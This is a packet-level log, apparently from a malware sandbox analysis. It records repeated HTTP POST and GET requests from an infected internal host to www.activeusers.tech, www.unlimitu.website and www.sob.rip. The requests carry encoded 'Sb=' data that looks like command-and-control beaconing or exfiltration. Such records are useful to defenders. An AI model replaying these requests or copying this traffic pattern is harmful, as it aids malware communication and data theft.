                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:07.102186918 CET | 676 | OUT | POST /f9au/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        Origin: http://www.activeusers.tech
                                                                                        Referer: http://www.activeusers.tech/f9au/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=dTFvZ2VPnYiRq3Mw3yea1Zslj+YWMmk7p36CxpybUsD0W8Fl8dsu07FPQLwgP7FeL0gKzTgjjLuoxBr6qS9gmytjJzY1Uhj7lVVli7U1wjFDWBR/MrdWSANgHaMkrUV1RhembeeVbmWuvTjakVREGq1m4wTNj6ak4cNqzqLBwABbpXpCPs3hiJeXoVBzd+8J1R4ZIZfD0a2emFjI8TITT24=
                                                                                        Dec 12, 2024 21:59:07.244713068 CET | 1200 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:06 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1134
                                                                                        x-request-id: 76d032a8-b17b-4aa6-9c94-65c89721f184
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==
                                                                                        set-cookie: parking_session=76d032a8-b17b-4aa6-9c94-65c89721f184; expires=Thu, 12 Dec 2024 21:14:07 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                                                        Dec 12, 2024 21:59:07.244817019 CET | 623 | IN
                                                                                        Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzZkMDMyYTgtYjE3Yi00YWE2LTljOTQtNjVjODk3Mj


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        76 | 192.168.11.20 | 49791 | 199.59.243.227 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:09.761071920 CET | 1289 | OUT | POST /f9au/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        Origin: http://www.activeusers.tech
                                                                                        Referer: http://www.activeusers.tech/f9au/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:59:09.761122942 CET | 3867 | OUT
                                                                                        Data Ascii: FW4v1cvEd5XkmwMTI/w8Y9DUkY6gmqYfLRbZUK3/jyVvRjGne9hXUYILlJ+3BpSY0xAtrUE7snNxzVOOxRN33iLvGpW9lxRIw5X8Kq/5FpE8XkfUxU++JFZWZMHE/w/Dh9nK6xnlowltBDrn1WmdGLukONjnySZDI7rkjg1FwsZVZwn/n28K9kbA8U3uA4elSixdC5YIOLyxTbXHn/so4wIG6vPzpWx5S3uN463+2VptYBEFgI7
                                                                                        Dec 12, 2024 21:59:09.761168957 CET | 2669 | OUT
                                                                                        Data Ascii: Gk3ir9Vlp4lhcIRU4LsG3Q3zIzUTgt8tdalrLkLxiHYTvfuMXTjky0EDqoJ8TGcDREH/0TqCUs2NbEFoqud514HPS1fVHv7bQibWU4hhXvRh7K6mVPxCaNRRg0KdWC6F2yTSfDFNVbealScvAk2C+/zVY5nIStbMSVE5YamBk8FAZH1pSxf4B2u0qVRcgQE6t0sH6EmFUMo6j7UT+0EBiYqgyrQw8Jm5wY49VwA8Jerya5Hy9tA
                                                                                        Dec 12, 2024 21:59:09.892649889 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:08 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1134
                                                                                        x-request-id: 21111cea-3dd4-4d3a-9d9a-88fe33d0c28c
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==
                                                                                        set-cookie: parking_session=21111cea-3dd4-4d3a-9d9a-88fe33d0c28c; expires=Thu, 12 Dec 2024 21:14:09 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_R/fR5qQWR1xDptT+DmYSSYR/2VJQ+VUI2409f40OoSTAAe3fXzVlaIhXcxlVus7LuSE9VVwXJuXSYnMM5AVaaw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:59:09.892698050 CET | 534 | IN
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMjExMTFjZWEtM2RkNC00ZDNhLTlkOWEtODhmZTMzZDBjMjhjIiwicGFnZV90aW1lIjoxNzM0MDM3MTQ5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuYWN0aXZldXNlcnMudGV


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        77 | 192.168.11.20 | 49792 | 199.59.243.227 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:12.409281015 CET | 386 | OUT | GET /f9au/?Hsa=KVXAK1dJ22EyzD&Sb=QRtPaBdQsqikqwtJ+Gac0NMmk/tHNWofn17hwciKQcyaSPo61+Z774QFVZQUbpc3NkgC7R9n74G00WikgwdAmD1VZwNHYhXmg3kBj5ds5wl7WitTMr5RZVw= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.activeusers.tech
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:59:12.555418015 CET | 1200 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:11 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1470
                                                                                        x-request-id: 5868581e-c45b-4fa5-994d-f21446299821
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ALI/9Olt9m1ZkzOMfzcy2LVj2hE0Gom0NMDOpcXQUuHK2TrWhpQp6HsbX4cM0ArCWMAwc2huG66tmwGKQrg3Tw==
                                                                                        set-cookie: parking_session=5868581e-c45b-4fa5-994d-f21446299821; expires=Thu, 12 Dec 2024 21:14:12 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ALI/9Olt9m1ZkzOMfzcy2LVj2hE0Gom0NMDOpcXQUuHK2TrWhpQp6HsbX4cM0ArCWMAwc2huG66tmwGKQrg3Tw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                                                        Dec 12, 2024 21:59:12.555428028 CET | 959 | IN
                                                                                        Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTg2ODU4MWUtYzQ1Yi00ZmE1LTk5NGQtZjIxNDQ2Mj


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        78 | 192.168.11.20 | 49793 | 209.74.79.40 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:17.751952887 CET | 656 | OUT | POST /b4eq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        Origin: http://www.unlimitu.website
                                                                                        Referer: http://www.unlimitu.website/b4eq/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=7ZbWDL3MqbDuQKinp3Zo6m2mGLC4zTFGwgRcOcWcsibr5+czyefcFPrywzx2KoDZMvakJk2elv8EBYQE7LKRA9XLut/qJf3GrgqSbMxOZ7haEkVKL9vMRQzRnFFQchWibzlYJHqr1UZFRxGQ3WhL4w1mXep1ICcEFT7vVNEKnCuF8o0Elb4hL0wExbvBYXGiGw==
                                                                                        Dec 12, 2024 21:59:17.931910038 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:59:17 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        79 | 192.168.11.20 | 49794 | 209.74.79.40 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:20.459032059 CET | 676 | OUT | POST /b4eq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        Origin: http://www.unlimitu.website
                                                                                        Referer: http://www.unlimitu.website/b4eq/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=7ZbWDL3MqbDufJ6nvQFo9G2lDLC44zFCwgdcOdS1vR/r6eMzjrzcAPry4Tx/XYDHMumWJhOelv4EBd8E68meBtXJvd/oNf3GrgqSbMV0Z75aEwRKIe3PYwzOgFFQWBWmbzkiJDqF1XxFR06Q2EFMtg0tTeo1YnpqBi79RucIh3SY5+5e4pMFIns21rWpaVH5b437CdpVXuc4YCPp7FEuVQo=
                                                                                        Dec 12, 2024 21:59:20.639538050 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:59:20 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        80 | 192.168.11.20 | 49795 | 209.74.79.40 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:23.157952070 CET | 1289 | OUT | POST /b4eq/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        Origin: http://www.unlimitu.website
                                                                                        Referer: http://www.unlimitu.website/b4eq/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:59:23.158000946 CET | 1289 | OUT |
                                                                                        Data Ascii: EOYdAS02Eru5dUBMOGGC8tQh3VPQXboCNts01Fycd09Qi1K6u4ZgbzG8wrliL6EDa1iAf9DT0HrDVI7h5wYJ2T6b/0Wg1+Sh5TRy/qyytagyVXk3nwAkEFBuCpS23oEcX5qyI2lakIfUo1CL/SqpLRAVliIX2LoAdV9ruN3vz0hAkonnjvNptda5OdEhS4cvC9GRHY6F4di177U4S4rpV49FHO3Par3wI1qIW7bkqUTF7ZuoQAy
                                                                                        Dec 12, 2024 21:59:23.158051014 CET | 5247 | OUT |
                                                                                        Data Ascii: ZMYtiKzz/6OTT+1ARBJKnkYV8xFLoxImsn7jAOoN8A76YlOTAk39MOcWeIsPx6uvDIqy6DaUsVPRcRBsd+GyY8HjuGHQLd7FmGXAOSKvEF2eT+KQS8oH9wB/ay/RHM7BilIFOaVicoiz/URCUKEakMkUP+hwWzlamaWWbM59j6e9Fcm9V2xkv4Et13G7FERJrF7FgFJGa1FU7WQeSHyErV1iqnULHlLxVHGQW8OY5Kah1v9Atcx
                                                                                        Dec 12, 2024 21:59:23.342456102 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:59:23 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        81 | 192.168.11.20 | 49796 | 209.74.79.40 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:25.857727051 CET | 386 | OUT | GET /b4eq/?Sb=2bz2A+/Foq3BfYH3nkBAyBiQIN6vyGxA4CsyDuG2uzWi6t8+qfWmEOSu1g9JXJzNDc3HOGTjteURa686/52bGvnFkZWUI+XcrzebZPERH7tGcGhGffP7RzY=&Hsa=KVXAK1dJ22EyzD HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.unlimitu.website
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:59:26.037225008 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                        Date: Thu, 12 Dec 2024 20:59:25 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 389
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        82 | 192.168.11.20 | 49797 | 199.59.243.227 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:31.172265053 CET | 629 | OUT | POST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 199
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=bxZWh/FHVvJva8St8ZhyClTaAmr9SKjvquJC2EetBaZ6h2+RgQACV/btCDBByEJrFTRsCHy5C2FJJYRkZZgRnHhv2CCzuM6MQQVQ5BJDAgIsyJR6Iw56Kqhr8NfWJ0Ilfv9gqO8reeHB3U7ICuoLfBVZURcQ2Dukuo3u5PMUYU83AX1q3Ue15FwoU5b2AE5fkA==
                                                                                        Dec 12, 2024 21:59:31.317600012 CET | 1200 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:31 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: 9a9c8482-1274-4c24-abcf-17fed1b9896f
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=9a9c8482-1274-4c24-abcf-17fed1b9896f; expires=Thu, 12 Dec 2024 21:14:31 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI1
                                                                                        Dec 12, 2024 21:59:31.317675114 CET | 587 | IN |
                                                                                        Data Ascii: 2P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWE5Yzg0ODItMTI3NC00YzI0LWFiY2YtMTdmZWQxYj


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        83 | 192.168.11.20 | 49798 | 199.59.243.227 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:33.830043077 CET | 649 | OUT | POST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 219
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Data Ascii: Sb=bxZWh/FHVvJvbcitzbJyHFTZFmr9dqjrqu1C2Fq9BI96v3ORhS4CW/btIjBE2EJaFTdaCCS5C15JJYBkZq4eo3ht7iCxzc6MQQVQ5BNtAgQsy5h6JSB9DKhs/NfWN0Ipfv9eqMYFed/B3UrID7UEGRVbQRd++mSvipXc29QcZ1EYMh4wqmqR6WsaQJieCG4E5FI+3GEVkfb5VoyCjI/H8D0=
                                                                                        Dec 12, 2024 21:59:33.961736917 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:33 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: 4b1d4339-042d-41a7-a302-0700284f170c
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=4b1d4339-042d-41a7-a302-0700284f170c; expires=Thu, 12 Dec 2024 21:14:33 GMT; path=/
                                                                                        connection: close
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                        Dec 12, 2024 21:59:33.961747885 CET498INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                        Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGIxZDQzMzktMDQyZC00MWE3LWEzMDItMDcwMDI4NGYxNzBjIiwicGFnZV90aW1lIjoxNzM0MDM3MTczLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuc29iLnJpcC90cDhrLyI


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        84 | 192.168.11.20 | 49799 | 199.59.243.227 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:36.470969915 CET | 1289 | OUT | POST /tp8k/ HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Cache-Control: max-age=0
                                                                                        Content-Length: 7367
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        Origin: http://www.sob.rip
                                                                                        Referer: http://www.sob.rip/tp8k/
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:59:36.602243900 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:36 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1098
                                                                                        x-request-id: 0a8be6d0-3b60-405e-a564-882926802967
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CsJg1TE1AyQXoU0KEdPbV7FSQ3I7br8XXS7hqRDtBPFiWBOh2Uqz90eYqv43Fz/dN6H0Agt2A4EnG7ikR/OOHQ==
                                                                                        set-cookie: parking_session=0a8be6d0-3b60-405e-a564-882926802967; expires=Thu, 12 Dec 2024 21:14:36 GMT; path=/
                                                                                        connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        85 | 192.168.11.20 | 49800 | 199.59.243.227 | 80
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        Dec 12, 2024 21:59:39.123608112 CET | 377 | OUT | GET /tp8k/?Hsa=KVXAK1dJ22EyzD&Sb=Wzx2iIlwW+94es3u4Lo0FS74KiXnatT9p9we6G2JYq0Bn2uTvRtkednmI39Cm2I2dBYZfF7KG0N4DZZkU64bjEcb6QrTm/GIaTVemQQoPiAr/pRWHyNTKL8= HTTP/1.1
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US
                                                                                        Connection: close
                                                                                        Host: www.sob.rip
                                                                                        User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.24.4; X11) KHTML/3.5.9 (like Gecko) (Debian package 4:3.5.9.dfsg.1-2+b1)
                                                                                        Dec 12, 2024 21:59:39.254616976 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                        date: Thu, 12 Dec 2024 20:59:38 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1450
